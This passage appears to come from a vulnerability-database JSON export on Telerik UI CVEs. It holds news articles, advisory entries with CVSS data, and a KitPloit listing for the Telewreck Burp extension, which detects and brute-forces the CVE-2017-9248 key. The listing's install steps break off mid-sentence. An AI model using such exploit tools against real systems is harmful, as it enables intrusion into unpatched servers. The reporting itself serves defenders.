public Wednesday along with a patch; there are no workarounds for the bug and [a software patch is required](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>), Cisco said.\n\nCisco\u2019s Industrial Network Director is a network management platform for visualizing industrial assets, and securing and managing them.\n\n\u201cThe vulnerability (CVE-2019-1861) is due to improper validation of files uploaded to the affected application,\u201d [Cisco wrote in its security advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>). \u201cAn attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.\u201d \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nImpacted are versions of Industrial Network Director prior to the 1.6.0 release.\n\n## Additional High-Severity Bugs\n\nOne Wednesday Cisco also released a fix for an additional high-severity flaw found in TelePresence VCS and multiple releases of its Unified Communications Manager (versions X8.1 to X12.5.2) products.\n\n\u201cA vulnerability in the authentication service of the Cisco Unified Communications Manager IM and Presence (Unified CM IM&P) Service, Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Series could allow an unauthenticated, remote attacker to cause a service outage for users attempting to authenticate, resulting in a denial of service condition,\u201d Cisco [wrote in its advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-cucm-imp-dos>) on the bug (CVE-2019-1845).\n\nThe vulnerability traces back to insufficient controls for specific memory operations, it said.\n\nMeanwhile, on Monday, Cisco also [released an update to a high-severity denial-of-service vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-iosxr-evpn-dos>) (CVE-2019-1849), originally made public on May 15.\n\nCisco said this bug impacts routers running a vulnerable release of Cisco IOS XR Software and that are participating in a Border Gateway Protocol (BGP) Multiprotocol Label Switching (MPLS)-based Ethernet VPN (EVPN).\n\n\u201c[An] implementation of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to trigger a denial-of-service condition on an affected device,\u201d Cisco wrote.\n\nAnd also of note, on Thursday Cisco released a patch for a [medium-severity remote file injection bug](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-cuic-cmdinj>) (CVE-2019-1860). On Wednesday it released patches for an [additional seven medium-severity vulnerabilities](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>).\n\nLast month, Cisco had an unusually busy patching month, tackling everything from a critical vulnerability in the [Cisco Elastic Services Controller](<https://threatpost.com/critical-flaw-in-cisco-elastic-services-controller-allows-full-system-takeover/144452/>), [a high-severity bug](<https://threatpost.com/cisco-bugs-unpatched-millions-devices/144692/>) in its web-based user interface (Web UI) of the Cisco IOS XE Software and [a flaw in the Secure Boot trusted hardware root-of-trust](<https://threatpost.com/cisco-patch-firmware/144936/>) affecting several model routers, switches and firewalls \u2014 this latter bug is still not patched for many of the millions of devices it affects.\n\n**_Ransomware is on the rise: _****_[Don\u2019t miss our free Threatpost webinar ](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)_****_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost_****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-06T17:43:57", "type": "threatpost", "title": "High-Severity Bug in Cisco Industrial Enterprise Tool Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1845", "CVE-2019-1849", "CVE-2019-1860", "CVE-2019-1861", "CVE-2019-18935"], "modified": "2019-06-06T17:43:57", "id": "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "href": "https://threatpost.com/cisco-high-severity-bugs/145446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-4958"], "description": "\r\n\r\nAll versions of the popular UI for ASP.NET AJAX RadEditor Control product by Telerik may be affected by a high-risk stored attribute-based cross-site scripting (XSS) vulnerability that is assigned CVE-2014-4958. This WYSIWYG rich text editor is \u201c...what Microsoft chose to use in MSDN, CodePlex, TechNet, MCMS and even as an alternative to the default editor in SharePoint.\u201d\r\n\r\nPersonally tested and confirmed are versions: 2014.1.403.35 (much newer) and 2009.3.1208.20 (much older) using Internet Explorer 8, version 8.0.7601.17514. However, all versions from Telerik at this time may be vulnerable and will continue to be until a patched is released. A workaround may be available.\r\n\r\nMore information on the vulnerability: http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/\r\n\r\nRemediation: Telerik states: We have applied a patch to the editor that will be delivered with our Q3 edition of the controls that should be released towards the end of October. A blog post on the issue has been published here: http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks\r\n\r\nAdditional credit goes to Tyler Hoyle and the rest of my team in CGI Federal\u2019s Emerging Technologies Security Practice for their hard work.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31198", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31198", "title": "CVE-2014-4958: Stored Attribute-Based Cross-Site Scripting (XSS) Vulnerability in Telerik UI for ASP.NET AJAX RadEditor Control", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-06-08T18:46:26", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4958", "CVE-2014-5450", "CVE-2014-4737", "CVE-2014-5516", "CVE-2014-5375", "CVE-2014-7138", "CVE-2014-5258", "CVE-2014-6035", "CVE-2014-4735", "CVE-2014-6300", "CVE-2014-4954", "CVE-2014-4986", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-6034", "CVE-2014-4955", "CVE-2014-5451", "CVE-2014-5259", "CVE-2014-4348", "CVE-2014-4349", "CVE-2014-6036", "CVE-2014-7217", "CVE-2014-6243", "CVE-2014-6242", "CVE-2014-5376", "CVE-2014-1608", "CVE-2014-5273", "CVE-2014-5300", "CVE-2014-6315", "CVE-2014-5297", "CVE-2014-5449", "CVE-2014-5448", "CVE-2014-5460", "CVE-2014-4987", "CVE-2014-7295", "CVE-2014-1609", "CVE-2014-5274", "CVE-2014-7139", "CVE-2014-5298"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:VULN:14008", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14008", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "veracode": [{"lastseen": "2022-07-27T10:08:23", "description": "telerik is vulnerable to information disclosure. A cryptographic weakness can be exploited to discover the encryption keys (Telerik.Web.UI.DialogParametersEncryptionKey and/or the MachineKey).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T09:14:10", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2022-04-19T18:14:44", "id": "VERACODE:25766", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25766/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-27T10:08:22", "description": "telerik.web.ui allows unrestricted file uploads. A remote attacker is able to upload arbitrary files which can result in arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T08:38:28", "type": "veracode", "title": "Unrestricted File Upload", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317"], "modified": "2020-10-21T01:10:10", "id": "VERACODE:25764", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25764/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-27T10:08:23", "description": "telerik.web.ui is vulnerable to insecure direct object reference. User input is not validated and used directly by `RadAsyncUpload` without modification or validation. This can potentially result in arbitrary file uploads and executino of arbitrary code.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T08:57:24", "type": "veracode", "title": "Insecure Direct Object Reference", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11357"], "modified": "2022-04-19T18:11:55", "id": "VERACODE:25765", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25765/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-27T10:08:23", "description": "telerik is vulnerable to remote code execution. A .NET JavaScriptSerializer Deserialization vulnerability through `RadAsyncUpload` allows an attacker to execute malicious code on the server in the context of the `w3wp.exe` process.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T09:22:09", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2020-10-21T01:12:00", "id": "VERACODE:25767", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25767/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Telerik UI for ASP.NET AJAX and Progress Sitefinity Cryptographic Weakness Vuln", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-9248", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX allows remote attackers to perform arbitrary file uploads or execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T00:00:00", "type": "cisa_kev", "title": "Telerik UI for ASP.NET AJAX Unrestricted File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317"], "modified": "2022-04-11T00:00:00", "id": "CISA-KEV-CVE-2017-11317", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Contains a .NET deserialization vulnerability in the RadAsyncUpload function that can result in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Progress Telerik UI for ASP.NET deserialization bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-18935", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:04:34", "description": "A [Burp](<https://www.kitploit.com/search/label/Burp>) extension to detect and exploit versions of Telerik Web UI [vulnerable](<https://www.kitploit.com/search/label/Vulnerable>) to [CVE-2017-9248](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>). This extension is based on the original exploit tool written by Paul Taylor ([@bao7uo](<https://twitter.com/bao7uo>)) which is available at <https://github.com/bao7uo/dp_crypto>. Credits and big thanks to him.\n\nA related blog post on how to exploit web applications via Telerik Web UI can also be found [here](<https://capt-meelo.github.io/pentest/2018/08/03/pwning-with-telerik.html>).\n\n \n\n\n**Features**\n\n * Detect vulnerable versions of Telerik Web UI during passive scans.\n * Bruteforce the key and [discover](<https://www.kitploit.com/search/label/Discover>) the \"Document Manager\" link just like the original exploit tool.\n \n**Screenshots** \n \n\n\n[![](https://1.bp.blogspot.com/-VVhTSzqz9Cg/W345gZPWdII/AAAAAAAAMNM/DYMQdFbzzUwRMB4Lum2Rp7yglrPmtL3NQCLcBGAs/s640/Telewreck_4_01.png)](<https://1.bp.blogspot.com/-VVhTSzqz9Cg/W345gZPWdII/AAAAAAAAMNM/DYMQdFbzzUwRMB4Lum2Rp7yglrPmtL3NQCLcBGAs/s1600/Telewreck_4_01.png>)\n\n \n \n\n\n[![](https://2.bp.blogspot.com/-1u6YS-1j5jA/W345ga46WZI/AAAAAAAAMNQ/Gfz3F1w5dOkGwVNa5yVJ8lwbBBWg5Hb5wCLcBGAs/s640/Telewreck_5_02.png)](<https://2.bp.blogspot.com/-1u6YS-1j5jA/W345ga46WZI/AAAAAAAAMNQ/Gfz3F1w5dOkGwVNa5yVJ8lwbBBWg5Hb5wCLcBGAs/s1600/Telewreck_5_02.png>)\n\n \n \n \n**Installation** \n\n\n 1. Download [telewreck.py](<https://raw.githubusercontent.com/capt-meelo/Telewreck/master/telewreck.py>) to your machine.\n 2. Install Python's **requests** module using `sudo pip install requests`.\n 3. On your Burp, go to _**Extender > Options**_ tab. Then under the **Python Environment** section, locate your **jython-standalone-2.7.0.jar** file (1) and the directory where Python's requests module is located (2).\n\n[![](https://2.bp.blogspot.com/-lgIeGL7t1Gc/W345u6KrAXI/AAAAAAAAMNU/5Oi5urXnCGkUxLIiVDdXSjweiOh7DvNvgCLcBGAs/s640/Telewreck_6_03.png)](<https://2.bp.blogspot.com/-lgIeGL7t1Gc/W345u6KrAXI/AAAAAAAAMNU/5Oi5urXnCGkUxLIiVDdXSjweiOh7DvNvgCLcBGAs/s1600/Telewreck_6_03.png>)\n\n 4. Go to _**Extender > Extensions**_ tab, then click on the _**Add**_ button. On the new window, browse the location of **telewreck.py** and click the _**Next**_ 